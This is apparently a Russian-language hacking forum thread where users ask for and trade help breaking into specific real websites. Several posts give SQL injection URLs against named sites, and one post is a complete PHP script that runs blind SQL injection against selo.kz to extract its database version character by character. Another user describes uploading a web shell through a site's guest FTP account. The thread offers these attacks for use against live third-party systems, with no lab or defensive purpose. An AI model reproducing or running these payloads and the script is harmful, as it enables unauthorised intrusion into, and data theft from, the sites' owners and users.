Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    дать ссылку сюды
     
  2. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://www.selo.kz/fspisok.php?id=-24+union+select+1--
    Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Gemini12 я не искал но в указанном месте нет вывода ..так что крути как слепую..версия там 5.0.85-log

    http://www.selo.kz/fspisok.php?id=24+AND+SUBSTRING((version()),1,1)=5--
     
  4. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    сплоит, он конечно кривоват, но работать должен:
    PHP:
    <?php

    #$chars="abcdef0123456789"; // для хеша
    #$chars="_.\\][)(:;!@#$%^&*-+='\"<>?/,}~{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789"; // для соли
    $chars=".54367890012-ntlog"// бд
    $i=1;
    $to=10;
    $c=0;
    $cc=0;
    $data="";
    $ebana="";
    set_time_limit(0);

    while(
    $i<=$to) {

        while(
    $c<=strlen($chars)) {
        
            echo 
    $i.":".$chars[$c];
            
    $sock=fsockopen("www.selo.kz"80$errno$errstr5);
                    if(!
    $sock) die("hehe fuckin connect");
            
    $ept="id=99999924+or+if(substring((select+version()),".$i.",1)=".$chars[$c].",(select+1+union+select+2),null)";
            
    $h="POST /fspisok.php? HTTP/1.0\r\n";
            
    $h.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
            
    $h.="Content-Type: application/x-www-form-urlencoded\r\n";
            
    $h.="User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\n";
            
    $h.="Host: www.selo.kz\r\n";
            
    $h.="Content-Length: ".strlen($ept)."\r\n";
            
    $h.="Cookie: bbsessionhash=636f59afa8e2b1a8519bbbf5669a48b6; bblastvisit=1242490434; bblastactivity=0\r\n\r\n";
            
    $h.=$ept;
            
    fwrite($sock$h);
            
    sleep(1);
            
    $c++;
            
    $data="";
            
                while(!
    feof($sock)) {
                    
    $data=fgets($sock1024);
                    if(
    eregi("Subquery returns more than 1 row"$data)) { $cc=1; break; }
                }
                
            if(
    $cc==1) { echo ":OKE!!1\r\n"$ebana.=$chars[$c-1]; break; }
            else echo 
    ":FUCK!1\r\n";
            
    fclose($sock);
        }
        
        
    $c=0;
        
    $cc=0;
        
    $i++;
        
    }

    echo 
    $ebana;

    ?>
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Aртем я думаю что для таких дел как раскрутка слепой скули есть много програм например сипт..кототрый поверь мне не настолько кривоват как твой скрипт..если конечно это твой скрипт
     
  6. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
    А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
     
    1 person likes this.
  8. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Соотношение время-качество играет весомую роль. Зачастую нет времени делать качественно. Но здесь важно не качество, а результат, чего-бы это не стоило. :)
     
    1 person likes this.
  9. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    Aртем
    если писать,то писать то что может конкурировать со скриптами выложенными в этой теме,а не лишь бы писать, где на перебор 1-го символа (не хеша где a-f0-9) - уходит 8 запросов (я взял пример Грея),в нем находится середина диапазона chr(0)-chr(255),и проверяется на истинность в зависимости от ответа - циклично ,ну это так,к слову.детальней это все описал Qwazar опять же thread119047.html
     
    1 person likes this.
  10. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    L I G A и Pashkela, я не в коем случае не пытался написать универсальный скрипт для посимвольного перебора и уж тем более набиваться в конкуренты. Я просто написал сплоит для посимвольного перебора, непосредственно основывая работу исходя из поста #9868
     
  11. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Возник такой вопрос
    Есть сайт
    Code:
    http://www.cstrike.ro/cs_1.6_servers.php?start=190
    
    Ошибку выдёт только в таком случаи
    Code:
    http://www.cstrike.ro/cs_1.6_servers.php?start=-190
    
    А так не хочет
    Code:
    http://www.cstrike.ro/cs_1.6_servers.php?start=190'
    
    т.е. там как я понял, такая фильтрация
    PHP:
    $start = (int)$_GET['start'];
    Реально ли раскрутить такую SQl inj , если это вообще SQL inj
     
  12. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    чтобы включить мозг попробуй такой скрипт
    PHP:
    <?php 
    echo ((int)$_GET['start']);
    ?>
    ну и тесть))
     
    3 people like this.
  13. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    если в MsSQL-inj нету вывода ошибки, то как можно такую БД раскрутить?
     
  14. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Byrger как слепую инъекцию http://forum.antichat.ru/thread43966-blind.html
    Вопросик-на сайте открыт фтп по логину guest,залил в папку uploads шелл,но когда через http хочу его открыть,говорят мол нету такой папки,при фтп соединении видно всего пару папок,сам сайт невиден.
     
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    У меня Ms SQL а не MySQL
     
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    ты сам ответил на свой вопрос)
    всеравно как слепую, попробуй BSQL Hacker облегчит тебе раскрутку ... не руками ж крутить :D
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    union select например
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://milw0rm.com/papers/279

     
  19. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    ага тогда вот такой вопрос
    есть ошибка в site.ru/news.php?page=-1

    выводит
    PHP:
    warningmysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/webhost/www/site/includes/common.inc(1685) : eval()'d code on line 13.
    при вставке ковычкеу никакой ошибки не выдаёт и при 2-1 выдаёт первую страницу.
    При and 1=2 тоже ошибку не выдаёт.

    Как можно попробовать такое раскрутить?
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ага, тогда у меня тоже вопрос, какие статьи ты прочитал, прежде чем задавать вопросы?
     
Thread Status:
Not open for further replies.